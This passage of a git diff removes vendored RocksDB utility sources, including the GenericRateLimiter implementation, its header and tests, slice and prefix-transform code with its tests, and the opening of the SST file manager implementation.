-                                       int64_t refill_period_us,
-                                       int32_t fairness, RateLimiter::Mode mode)
-    : RateLimiter(mode),
-      refill_period_us_(refill_period_us),
-      rate_bytes_per_sec_(rate_bytes_per_sec),
-      refill_bytes_per_period_(
-          CalculateRefillBytesPerPeriod(rate_bytes_per_sec)),
-      env_(Env::Default()),
-      stop_(false),
-      exit_cv_(&request_mutex_),
-      requests_to_wait_(0),
-      available_bytes_(0),
-      next_refill_us_(NowMicrosMonotonic(env_)),
-      fairness_(fairness > 100 ? 100 : fairness),
-      rnd_((uint32_t)time(nullptr)),
-      leader_(nullptr) {
-  total_requests_[0] = 0;
-  total_requests_[1] = 0;
-  total_bytes_through_[0] = 0;
-  total_bytes_through_[1] = 0;
-}
-
-GenericRateLimiter::~GenericRateLimiter() {
-  MutexLock g(&request_mutex_);
-  stop_ = true;
-  requests_to_wait_ = static_cast<int32_t>(queue_[Env::IO_LOW].size() +
-                                           queue_[Env::IO_HIGH].size());
-  for (auto& r : queue_[Env::IO_HIGH]) {
-    r->cv.Signal();
-  }
-  for (auto& r : queue_[Env::IO_LOW]) {
-    r->cv.Signal();
-  }
-  while (requests_to_wait_ > 0) {
-    exit_cv_.Wait();
-  }
-}
-
-// This API allows user to dynamically change rate limiter's bytes per second.
-void GenericRateLimiter::SetBytesPerSecond(int64_t bytes_per_second) {
-  assert(bytes_per_second > 0);
-  rate_bytes_per_sec_ = bytes_per_second;
-  refill_bytes_per_period_.store(
-      CalculateRefillBytesPerPeriod(bytes_per_second),
-      std::memory_order_relaxed);
-}
-
-void GenericRateLimiter::Request(int64_t bytes, const Env::IOPriority pri,
-                                 Statistics* stats) {
-  assert(bytes <= refill_bytes_per_period_.load(std::memory_order_relaxed));
-  TEST_SYNC_POINT("GenericRateLimiter::Request");
-  TEST_SYNC_POINT_CALLBACK("GenericRateLimiter::Request:1",
-                           &rate_bytes_per_sec_);
-  MutexLock g(&request_mutex_);
-  if (stop_) {
-    return;
-  }
-
-  ++total_requests_[pri];
-
-  if (available_bytes_ >= bytes) {
-    // Refill thread assigns quota and notifies requests waiting on
-    // the queue under mutex. So if we get here, that means nobody
-    // is waiting?
-    available_bytes_ -= bytes;
-    total_bytes_through_[pri] += bytes;
-    return;
-  }
-
-  // Request cannot be satisfied at this moment, enqueue
-  Req r(bytes, &request_mutex_);
-  queue_[pri].push_back(&r);
-
-  do {
-    bool timedout = false;
-    // Leader election, candidates can be:
-    // (1) a new incoming request,
-    // (2) a previous leader, whose quota has not been not assigned yet due
-    //     to lower priority
-    // (3) a previous waiter at the front of queue, who got notified by
-    //     previous leader
-    if (leader_ == nullptr &&
-        ((!queue_[Env::IO_HIGH].empty() &&
-            &r == queue_[Env::IO_HIGH].front()) ||
-         (!queue_[Env::IO_LOW].empty() &&
-            &r == queue_[Env::IO_LOW].front()))) {
-      leader_ = &r;
-      int64_t delta = next_refill_us_ - NowMicrosMonotonic(env_);
-      delta = delta > 0 ? delta : 0;
-      if (delta == 0) {
-        timedout = true;
-      } else {
-        int64_t wait_until = env_->NowMicros() + delta;
-        RecordTick(stats, NUMBER_RATE_LIMITER_DRAINS);
-        timedout = r.cv.TimedWait(wait_until);
-      }
-    } else {
-      // Not at the front of queue or an leader has already been elected
-      r.cv.Wait();
-    }
-
-    // request_mutex_ is held from now on
-    if (stop_) {
-      --requests_to_wait_;
-      exit_cv_.Signal();
-      return;
-    }
-
-    // Make sure the waken up request is always the header of its queue
-    assert(r.granted ||
-           (!queue_[Env::IO_HIGH].empty() &&
-            &r == queue_[Env::IO_HIGH].front()) ||
-           (!queue_[Env::IO_LOW].empty() &&
-            &r == queue_[Env::IO_LOW].front()));
-    assert(leader_ == nullptr ||
-           (!queue_[Env::IO_HIGH].empty() &&
-            leader_ == queue_[Env::IO_HIGH].front()) ||
-           (!queue_[Env::IO_LOW].empty() &&
-            leader_ == queue_[Env::IO_LOW].front()));
-
-    if (leader_ == &r) {
-      // Waken up from TimedWait()
-      if (timedout) {
-        // Time to do refill!
-        Refill();
-
-        // Re-elect a new leader regardless. This is to simplify the
-        // election handling.
-        leader_ = nullptr;
-
-        // Notify the header of queue if current leader is going away
-        if (r.granted) {
-          // Current leader already got granted with quota. Notify header
-          // of waiting queue to participate next round of election.
-          assert((queue_[Env::IO_HIGH].empty() ||
-                    &r != queue_[Env::IO_HIGH].front()) &&
-                 (queue_[Env::IO_LOW].empty() ||
-                    &r != queue_[Env::IO_LOW].front()));
-          if (!queue_[Env::IO_HIGH].empty()) {
-            queue_[Env::IO_HIGH].front()->cv.Signal();
-          } else if (!queue_[Env::IO_LOW].empty()) {
-            queue_[Env::IO_LOW].front()->cv.Signal();
-          }
-          // Done
-          break;
-        }
-      } else {
-        // Spontaneous wake up, need to continue to wait
-        assert(!r.granted);
-        leader_ = nullptr;
-      }
-    } else {
-      // Waken up by previous leader:
-      // (1) if requested quota is granted, it is done.
-      // (2) if requested quota is not granted, this means current thread
-      // was picked as a new leader candidate (previous leader got quota).
-      // It needs to participate leader election because a new request may
-      // come in before this thread gets waken up. So it may actually need
-      // to do Wait() again.
-      assert(!timedout);
-    }
-  } while (!r.granted);
-}
-
-void GenericRateLimiter::Refill() {
-  TEST_SYNC_POINT("GenericRateLimiter::Refill");
-  next_refill_us_ = NowMicrosMonotonic(env_) + refill_period_us_;
-  // Carry over the left over quota from the last period
-  auto refill_bytes_per_period =
-      refill_bytes_per_period_.load(std::memory_order_relaxed);
-  if (available_bytes_ < refill_bytes_per_period) {
-    available_bytes_ += refill_bytes_per_period;
-  }
-
-  int use_low_pri_first = rnd_.OneIn(fairness_) ? 0 : 1;
-  for (int q = 0; q < 2; ++q) {
-    auto use_pri = (use_low_pri_first == q) ? Env::IO_LOW : Env::IO_HIGH;
-    auto* queue = &queue_[use_pri];
-    while (!queue->empty()) {
-      auto* next_req = queue->front();
-      if (available_bytes_ < next_req->request_bytes) {
-        // avoid starvation
-        next_req->request_bytes -= available_bytes_;
-        available_bytes_ = 0;
-        break;
-      }
-      available_bytes_ -= next_req->request_bytes;
-      next_req->request_bytes = 0;
-      total_bytes_through_[use_pri] += next_req->bytes;
-      queue->pop_front();
-
-      next_req->granted = true;
-      if (next_req != leader_) {
-        // Quota granted, signal the thread
-        next_req->cv.Signal();
-      }
-    }
-  }
-}
-
-int64_t GenericRateLimiter::CalculateRefillBytesPerPeriod(
-    int64_t rate_bytes_per_sec) {
-  if (port::kMaxInt64 / rate_bytes_per_sec < refill_period_us_) {
-    // Avoid unexpected result in the overflow case. The result now is still
-    // inaccurate but is a number that is large enough.
-    return port::kMaxInt64 / 1000000;
-  } else {
-    return std::max(kMinRefillBytesPerPeriod,
-                    rate_bytes_per_sec * refill_period_us_ / 1000000);
-  }
-}
-
-RateLimiter* NewGenericRateLimiter(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us /* = 100 * 1000 */,
-    int32_t fairness /* = 10 */,
-    RateLimiter::Mode mode /* = RateLimiter::Mode::kWritesOnly */) {
-  assert(rate_bytes_per_sec > 0);
-  assert(refill_period_us > 0);
-  assert(fairness > 0);
-  return new GenericRateLimiter(rate_bytes_per_sec, refill_period_us, fairness,
-                                mode);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter.h b/thirdparty/rocksdb/util/rate_limiter.h
deleted file mode 100644
index 0564bd0..0000000
--- a/thirdparty/rocksdb/util/rate_limiter.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <algorithm>
-#include <atomic>
-#include <deque>
-#include "port/port.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "rocksdb/env.h"
-#include "rocksdb/rate_limiter.h"
-
-namespace rocksdb {
-
-class GenericRateLimiter : public RateLimiter {
- public:
-  GenericRateLimiter(int64_t refill_bytes, int64_t refill_period_us,
-                     int32_t fairness,
-                     RateLimiter::Mode mode = RateLimiter::Mode::kWritesOnly);
-
-  virtual ~GenericRateLimiter();
-
-  // This API allows user to dynamically change rate limiter's bytes per second.
-  virtual void SetBytesPerSecond(int64_t bytes_per_second) override;
-
-  // Request for token to write bytes. If this request can not be satisfied,
-  // the call is blocked. Caller is responsible to make sure
-  // bytes <= GetSingleBurstBytes()
-  using RateLimiter::Request;
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* stats) override;
-
-  virtual int64_t GetSingleBurstBytes() const override {
-    return refill_bytes_per_period_.load(std::memory_order_relaxed);
-  }
-
-  virtual int64_t GetTotalBytesThrough(
-      const Env::IOPriority pri = Env::IO_TOTAL) const override {
-    MutexLock g(&request_mutex_);
-    if (pri == Env::IO_TOTAL) {
-      return total_bytes_through_[Env::IO_LOW] +
-             total_bytes_through_[Env::IO_HIGH];
-    }
-    return total_bytes_through_[pri];
-  }
-
-  virtual int64_t GetTotalRequests(
-      const Env::IOPriority pri = Env::IO_TOTAL) const override {
-    MutexLock g(&request_mutex_);
-    if (pri == Env::IO_TOTAL) {
-      return total_requests_[Env::IO_LOW] + total_requests_[Env::IO_HIGH];
-    }
-    return total_requests_[pri];
-  }
-
-  virtual int64_t GetBytesPerSecond() const override {
-    return rate_bytes_per_sec_;
-  }
-
- private:
-  void Refill();
-  int64_t CalculateRefillBytesPerPeriod(int64_t rate_bytes_per_sec);
-  uint64_t NowMicrosMonotonic(Env* env) {
-    return env->NowNanos() / std::milli::den;
-  }
-
-  // This mutex guard all internal states
-  mutable port::Mutex request_mutex_;
-
-  const int64_t kMinRefillBytesPerPeriod = 100;
-
-  const int64_t refill_period_us_;
-
-  int64_t rate_bytes_per_sec_;
-  // This variable can be changed dynamically.
-  std::atomic<int64_t> refill_bytes_per_period_;
-  Env* const env_;
-
-  bool stop_;
-  port::CondVar exit_cv_;
-  int32_t requests_to_wait_;
-
-  int64_t total_requests_[Env::IO_TOTAL];
-  int64_t total_bytes_through_[Env::IO_TOTAL];
-  int64_t available_bytes_;
-  int64_t next_refill_us_;
-
-  int32_t fairness_;
-  Random rnd_;
-
-  struct Req;
-  Req* leader_;
-  std::deque<Req*> queue_[Env::IO_TOTAL];
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter_test.cc b/thirdparty/rocksdb/util/rate_limiter_test.cc
deleted file mode 100644
index f099808..0000000
--- a/thirdparty/rocksdb/util/rate_limiter_test.cc
+++ /dev/null
@@ -1,180 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/rate_limiter.h"
-#include <inttypes.h>
-#include <limits>
-#include "rocksdb/env.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// TODO(yhchiang): the rate will not be accurate when we run test in parallel.
-class RateLimiterTest : public testing::Test {};
-
-TEST_F(RateLimiterTest, OverflowRate) {
-  GenericRateLimiter limiter(port::kMaxInt64, 1000, 10);
-  ASSERT_GT(limiter.GetSingleBurstBytes(), 1000000000ll);
-}
-
-TEST_F(RateLimiterTest, StartStop) {
-  std::unique_ptr<RateLimiter> limiter(NewGenericRateLimiter(100, 100, 10));
-}
-
-TEST_F(RateLimiterTest, Modes) {
-  for (auto mode : {RateLimiter::Mode::kWritesOnly,
-                    RateLimiter::Mode::kReadsOnly, RateLimiter::Mode::kAllIo}) {
-    GenericRateLimiter limiter(2000 /* rate_bytes_per_sec */,
-                               1000 * 1000 /* refill_period_us */,
-                               10 /* fairness */, mode);
-    limiter.Request(1000 /* bytes */, Env::IO_HIGH, nullptr /* stats */,
-                    RateLimiter::OpType::kRead);
-    if (mode == RateLimiter::Mode::kWritesOnly) {
-      ASSERT_EQ(0, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    } else {
-      ASSERT_EQ(1000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    }
-
-    limiter.Request(1000 /* bytes */, Env::IO_HIGH, nullptr /* stats */,
-                    RateLimiter::OpType::kWrite);
-    if (mode == RateLimiter::Mode::kAllIo) {
-      ASSERT_EQ(2000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    } else {
-      ASSERT_EQ(1000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    }
-  }
-}
-
-#if !(defined(TRAVIS) && defined(OS_MACOSX))
-TEST_F(RateLimiterTest, Rate) {
-  auto* env = Env::Default();
-  struct Arg {
-    Arg(int32_t _target_rate, int _burst)
-        : limiter(NewGenericRateLimiter(_target_rate, 100 * 1000, 10)),
-          request_size(_target_rate / 10),
-          burst(_burst) {}
-    std::unique_ptr<RateLimiter> limiter;
-    int32_t request_size;
-    int burst;
-  };
-
-  auto writer = [](void* p) {
-    auto* thread_env = Env::Default();
-    auto* arg = static_cast<Arg*>(p);
-    // Test for 2 seconds
-    auto until = thread_env->NowMicros() + 2 * 1000000;
-    Random r((uint32_t)(thread_env->NowNanos() %
-                        std::numeric_limits<uint32_t>::max()));
-    while (thread_env->NowMicros() < until) {
-      for (int i = 0; i < static_cast<int>(r.Skewed(arg->burst) + 1); ++i) {
-        arg->limiter->Request(r.Uniform(arg->request_size - 1) + 1,
-                              Env::IO_HIGH, nullptr /* stats */,
-                              RateLimiter::OpType::kWrite);
-      }
-      arg->limiter->Request(r.Uniform(arg->request_size - 1) + 1, Env::IO_LOW,
-                            nullptr /* stats */, RateLimiter::OpType::kWrite);
-    }
-  };
-
-  for (int i = 1; i <= 16; i *= 2) {
-    int32_t target = i * 1024 * 10;
-    Arg arg(target, i / 4 + 1);
-    int64_t old_total_bytes_through = 0;
-    for (int iter = 1; iter <= 2; ++iter) {
-      // second iteration changes the target dynamically
-      if (iter == 2) {
-        target *= 2;
-        arg.limiter->SetBytesPerSecond(target);
-      }
-      auto start = env->NowMicros();
-      for (int t = 0; t < i; ++t) {
-        env->StartThread(writer, &arg);
-      }
-      env->WaitForJoin();
-
-      auto elapsed = env->NowMicros() - start;
-      double rate =
-          (arg.limiter->GetTotalBytesThrough() - old_total_bytes_through) *
-          1000000.0 / elapsed;
-      old_total_bytes_through = arg.limiter->GetTotalBytesThrough();
-      fprintf(stderr,
-              "request size [1 - %" PRIi32 "], limit %" PRIi32
-              " KB/sec, actual rate: %lf KB/sec, elapsed %.2lf seconds\n",
-              arg.request_size - 1, target / 1024, rate / 1024,
-              elapsed / 1000000.0);
-
-      ASSERT_GE(rate / target, 0.80);
-      ASSERT_LE(rate / target, 1.25);
-    }
-  }
-}
-#endif
-
-TEST_F(RateLimiterTest, LimitChangeTest) {
-  // starvation test when limit changes to a smaller value
-  int64_t refill_period = 1000 * 1000;
-  auto* env = Env::Default();
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  struct Arg {
-    Arg(int32_t _request_size, Env::IOPriority _pri,
-        std::shared_ptr<RateLimiter> _limiter)
-        : request_size(_request_size), pri(_pri), limiter(_limiter) {}
-    int32_t request_size;
-    Env::IOPriority pri;
-    std::shared_ptr<RateLimiter> limiter;
-  };
-
-  auto writer = [](void* p) {
-    auto* arg = static_cast<Arg*>(p);
-    arg->limiter->Request(arg->request_size, arg->pri, nullptr /* stats */,
-                          RateLimiter::OpType::kWrite);
-  };
-
-  for (uint32_t i = 1; i <= 16; i <<= 1) {
-    int32_t target = i * 1024 * 10;
-    // refill per second
-    for (int iter = 0; iter < 2; iter++) {
-      std::shared_ptr<RateLimiter> limiter =
-          std::make_shared<GenericRateLimiter>(target, refill_period, 10);
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"GenericRateLimiter::Request",
-            "RateLimiterTest::LimitChangeTest:changeLimitStart"},
-           {"RateLimiterTest::LimitChangeTest:changeLimitEnd",
-            "GenericRateLimiter::Refill"}});
-      Arg arg(target, Env::IO_HIGH, limiter);
-      // The idea behind is to start a request first, then before it refills,
-      // update limit to a different value (2X/0.5X). No starvation should
-      // be guaranteed under any situation
-      // TODO(lightmark): more test cases are welcome.
-      env->StartThread(writer, &arg);
-      int32_t new_limit = (target << 1) >> (iter << 1);
-      TEST_SYNC_POINT("RateLimiterTest::LimitChangeTest:changeLimitStart");
-      arg.limiter->SetBytesPerSecond(new_limit);
-      TEST_SYNC_POINT("RateLimiterTest::LimitChangeTest:changeLimitEnd");
-      env->WaitForJoin();
-      fprintf(stderr,
-              "[COMPLETE] request size %" PRIi32 " KB, new limit %" PRIi32
-              "KB/sec, refill period %" PRIi64 " ms\n",
-              target / 1024, new_limit / 1024, refill_period / 1000);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/slice.cc b/thirdparty/rocksdb/util/slice.cc
deleted file mode 100644
index 8d95a8a..0000000
--- a/thirdparty/rocksdb/util/slice.cc
+++ /dev/null
@@ -1,202 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/slice.h"
-#include "util/string_util.h"
-#include <stdio.h>
-
-namespace rocksdb {
-
-namespace {
-
-class FixedPrefixTransform : public SliceTransform {
- private:
-  size_t prefix_len_;
-  std::string name_;
-
- public:
-  explicit FixedPrefixTransform(size_t prefix_len)
-      : prefix_len_(prefix_len),
-        // Note that if any part of the name format changes, it will require
-        // changes on options_helper in order to make RocksDBOptionsParser work
-        // for the new change.
-        // TODO(yhchiang): move serialization / deserializaion code inside
-        // the class implementation itself.
-        name_("rocksdb.FixedPrefix." + ToString(prefix_len_)) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return Slice(src.data(), prefix_len_);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    return (src.size() >= prefix_len_);
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() == prefix_len_);
-  }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return InDomain(prefix);
-  }
-};
-
-class CappedPrefixTransform : public SliceTransform {
- private:
-  size_t cap_len_;
-  std::string name_;
-
- public:
-  explicit CappedPrefixTransform(size_t cap_len)
-      : cap_len_(cap_len),
-        // Note that if any part of the name format changes, it will require
-        // changes on options_helper in order to make RocksDBOptionsParser work
-        // for the new change.
-        // TODO(yhchiang): move serialization / deserializaion code inside
-        // the class implementation itself.
-        name_("rocksdb.CappedPrefix." + ToString(cap_len_)) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return Slice(src.data(), std::min(cap_len_, src.size()));
-  }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() <= cap_len_);
-  }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return prefix.size() >= cap_len_;
-  }
-};
-
-class NoopTransform : public SliceTransform {
- public:
-  explicit NoopTransform() { }
-
-  virtual const char* Name() const override { return "rocksdb.Noop"; }
-
-  virtual Slice Transform(const Slice& src) const override { return src; }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override { return true; }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return false;
-  }
-};
-
-}
-
-// 2 small internal utility functions, for efficient hex conversions
-// and no need for snprintf, toupper etc...
-// Originally from wdt/util/EncryptionUtils.cpp - for ToString(true)/DecodeHex:
-char toHex(unsigned char v) {
-  if (v <= 9) {
-    return '0' + v;
-  }
-  return 'A' + v - 10;
-}
-// most of the code is for validation/error check
-int fromHex(char c) {
-  // toupper:
-  if (c >= 'a' && c <= 'f') {
-    c -= ('a' - 'A');  // aka 0x20
-  }
-  // validation
-  if (c < '0' || (c > '9' && (c < 'A' || c > 'F'))) {
-    return -1;  // invalid not 0-9A-F hex char
-  }
-  if (c <= '9') {
-    return c - '0';
-  }
-  return c - 'A' + 10;
-}
-
-Slice::Slice(const SliceParts& parts, std::string* buf) {
-  size_t length = 0;
-  for (int i = 0; i < parts.num_parts; ++i) {
-    length += parts.parts[i].size();
-  }
-  buf->reserve(length);
-
-  for (int i = 0; i < parts.num_parts; ++i) {
-    buf->append(parts.parts[i].data(), parts.parts[i].size());
-  }
-  data_ = buf->data();
-  size_ = buf->size();
-}
-
-// Return a string that contains the copy of the referenced data.
-std::string Slice::ToString(bool hex) const {
-  std::string result;  // RVO/NRVO/move
-  if (hex) {
-    result.reserve(2 * size_);
-    for (size_t i = 0; i < size_; ++i) {
-      unsigned char c = data_[i];
-      result.push_back(toHex(c >> 4));
-      result.push_back(toHex(c & 0xf));
-    }
-    return result;
-  } else {
-    result.assign(data_, size_);
-    return result;
-  }
-}
-
-// Originally from rocksdb/utilities/ldb_cmd.h
-bool Slice::DecodeHex(std::string* result) const {
-  std::string::size_type len = size_;
-  if (len % 2) {
-    // Hex string must be even number of hex digits to get complete bytes back
-    return false;
-  }
-  if (!result) {
-    return false;
-  }
-  result->clear();
-  result->reserve(len / 2);
-
-  for (size_t i = 0; i < len;) {
-    int h1 = fromHex(data_[i++]);
-    if (h1 < 0) {
-      return false;
-    }
-    int h2 = fromHex(data_[i++]);
-    if (h2 < 0) {
-      return false;
-    }
-    result->push_back((h1 << 4) | h2);
-  }
-  return true;
-}
-
-const SliceTransform* NewFixedPrefixTransform(size_t prefix_len) {
-  return new FixedPrefixTransform(prefix_len);
-}
-
-const SliceTransform* NewCappedPrefixTransform(size_t cap_len) {
-  return new CappedPrefixTransform(cap_len);
-}
-
-const SliceTransform* NewNoopTransform() {
-  return new NoopTransform;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/slice_transform_test.cc b/thirdparty/rocksdb/util/slice_transform_test.cc
deleted file mode 100644
index 0b0e564..0000000
--- a/thirdparty/rocksdb/util/slice_transform_test.cc
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/slice_transform.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class SliceTransformTest : public testing::Test {};
-
-TEST_F(SliceTransformTest, CapPrefixTransform) {
-  std::string s;
-  s = "abcdefge";
-
-  unique_ptr<const SliceTransform> transform;
-
-  transform.reset(NewCappedPrefixTransform(6));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdef");
-  ASSERT_TRUE(transform->SameResultWhenAppended("123456"));
-  ASSERT_TRUE(transform->SameResultWhenAppended("1234567"));
-  ASSERT_TRUE(!transform->SameResultWhenAppended("12345"));
-
-  transform.reset(NewCappedPrefixTransform(8));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdefge");
-
-  transform.reset(NewCappedPrefixTransform(10));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdefge");
-
-  transform.reset(NewCappedPrefixTransform(0));
-  ASSERT_EQ(transform->Transform(s).ToString(), "");
-
-  transform.reset(NewCappedPrefixTransform(0));
-  ASSERT_EQ(transform->Transform("").ToString(), "");
-}
-
-class SliceTransformDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
- public:
-  SliceTransformDBTest() : env_(Env::Default()), db_(nullptr) {
-    dbname_ = test::TmpDir() + "/slice_transform_db_test";
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  ~SliceTransformDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  DB* db() { return db_; }
-
-  // Return the current option configuration.
-  Options* GetOptions() { return &last_options_; }
-
-  void DestroyAndReopen() {
-    // Destroy using last options
-    Destroy();
-    ASSERT_OK(TryReopen());
-  }
-
-  void Destroy() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  Status TryReopen() {
-    delete db_;
-    db_ = nullptr;
-    last_options_.create_if_missing = true;
-
-    return DB::Open(last_options_, dbname_, &db_);
-  }
-
-  Options last_options_;
-};
-
-namespace {
-uint64_t TestGetTickerCount(const Options& options, Tickers ticker_type) {
-  return options.statistics->getTickerCount(ticker_type);
-}
-}  // namespace
-
-TEST_F(SliceTransformDBTest, CapPrefix) {
-  last_options_.prefix_extractor.reset(NewCappedPrefixTransform(8));
-  last_options_.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  last_options_.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  ASSERT_OK(TryReopen());
-
-  ReadOptions ro;
-  FlushOptions fo;
-  WriteOptions wo;
-
-  ASSERT_OK(db()->Put(wo, "barbarbar", "foo"));
-  ASSERT_OK(db()->Put(wo, "barbarbar2", "foo2"));
-  ASSERT_OK(db()->Put(wo, "foo", "bar"));
-  ASSERT_OK(db()->Put(wo, "foo3", "bar3"));
-  ASSERT_OK(db()->Flush(fo));
-
-  unique_ptr<Iterator> iter(db()->NewIterator(ro));
-
-  iter->Seek("foo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->value().ToString(), "bar");
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 0U);
-
-  iter->Seek("foo2");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 1U);
-
-  iter->Seek("barbarbar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->value().ToString(), "foo");
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 1U);
-
-  iter->Seek("barfoofoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 2U);
-
-  iter->Seek("foobarbar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 3U);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/sst_file_manager_impl.cc b/thirdparty/rocksdb/util/sst_file_manager_impl.cc
deleted file mode 100644
index 511df32..0000000
--- a/thirdparty/rocksdb/util/sst_file_manager_impl.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/sst_file_manager_impl.h"
-
-#include <vector>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_manager.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-SstFileManagerImpl::SstFileManagerImpl(Env* env, std::shared_ptr<Logger> logger,
-                                       const std::string& trash_dir,
-                                       int64_t rate_bytes_per_sec)
-    : env_(env),
-      logger_(logger),
-      total_files_size_(0),
-      max_allowed_space_(0),
-      delete_scheduler_(env, trash_dir, rate_bytes_per_sec, logger.get(),
-                        this) {}
-
-SstFileManagerImpl::~SstFileManagerImpl() {}
-
-Status SstFileManagerImpl::OnAddFile(const std::string& file_path) {
-  uint64_t file_size;
-  Status s = env_->GetFileSize(file_path, &file_size);
-  if (s.ok()) {
-    MutexLock l(&mu_);
-    OnAddFileImpl(file_path, file_size);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnAddFile");
-  return s;
-}
-
-Status SstFileManagerImpl::OnDeleteFile(const std::string& file_path) {
-  {
-    MutexLock l(&mu_);
-    OnDeleteFileImpl(file_path);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnDeleteFile");
-  return Status::OK();
-}
-
